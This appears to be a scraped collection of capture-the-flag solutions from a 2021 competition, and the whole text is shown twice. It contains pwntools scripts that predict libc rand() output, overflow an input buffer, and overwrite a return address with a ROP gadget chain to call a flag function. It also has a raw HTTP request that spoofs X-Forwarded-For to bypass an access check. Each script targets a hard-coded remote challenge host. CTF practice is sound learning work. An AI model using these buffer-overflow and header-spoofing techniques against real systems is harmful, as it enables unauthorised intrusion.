po6ix/MoM5m4g1c.py

## README.md

      
    Raw
  

              README.md
            
          
pwn

k3Y
MoM5m4g1c
Pr1ns0n_Br34k


web

masker


## k3Y.py
from ctypes import *
from pwn import *

libc = CDLL("libc.so.6")

# p = process('./chall')
p = remote('20.42.99.115', 3143)

key = libc.rand() ^ 0xACEDFACE
p.sendline(str(key))

print(p.recvall(timeout=1))
p.close()

## masker.http
GET /getFlag HTTP/1.1
Host: wtfmasker.herokuapp.com
Cache-Control: max-age=0
Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Dnt: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
x-forwarded-for: 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
x-forwarded-for: , 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
Referer: https://wtfctf.wearemist.in/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ko-KR;q=0.8,ko;q=0.7
If-None-Match: W/"1ba-179360a0180"
If-Modified-Since: Tue, 04 May 2021 06:21:36 GMT
Connection: close

## MoM5m4g1c.py
from pwn import *

p = remote('20.42.99.115', 3000)

payload = b'\1'*150

p.sendline(payload)
p.interactive()

## Pr1ns0n_Br34k.py
from pwn import *

# p = process('./prison')
p = remote('20.42.99.115', 3213)

for i in range(5):
    p.sendafter(':', 'x')

payload = p64(0x4011B2)*18 # flag()
payload += b'c'*0x18
payload += p64(0x401488) # pop r14; pop r15; ret
payload += b'd'*0x40

p.sendlineafter(':', payload)

p.interactive()
	from ctypes import *
	from pwn import *

	libc = CDLL("libc.so.6")

	# p = process('./chall')
	p = remote('20.42.99.115', 3143)

	key = libc.rand() ^ 0xACEDFACE
	p.sendline(str(key))

	print(p.recvall(timeout=1))
	p.close()
	GET /getFlag HTTP/1.1
	Host: wtfmasker.herokuapp.com
	Cache-Control: max-age=0
	Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
	Sec-Ch-Ua-Mobile: ?0
	Upgrade-Insecure-Requests: 1
	Dnt: 1
	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
	x-forwarded-for: 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
	x-forwarded-for: , 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9, 6.9.6.9
	Referer: https://wtfctf.wearemist.in/
	Accept-Encoding: gzip, deflate
	Accept-Language: en-US,en;q=0.9,ko-KR;q=0.8,ko;q=0.7
	If-None-Match: W/"1ba-179360a0180"
	If-Modified-Since: Tue, 04 May 2021 06:21:36 GMT
	Connection: close
	from pwn import *

	p = remote('20.42.99.115', 3000)

	payload = b'\1'*150

	p.sendline(payload)
	p.interactive()
	from pwn import *

	# p = process('./prison')
	p = remote('20.42.99.115', 3213)

	for i in range(5):
	p.sendafter(':', 'x')

	payload = p64(0x4011B2)*18 # flag()
	payload += b'c'*0x18
	payload += p64(0x401488) # pop r14; pop r15; ret
	payload += b'd'*0x40

	p.sendlineafter(':', payload)

	p.interactive()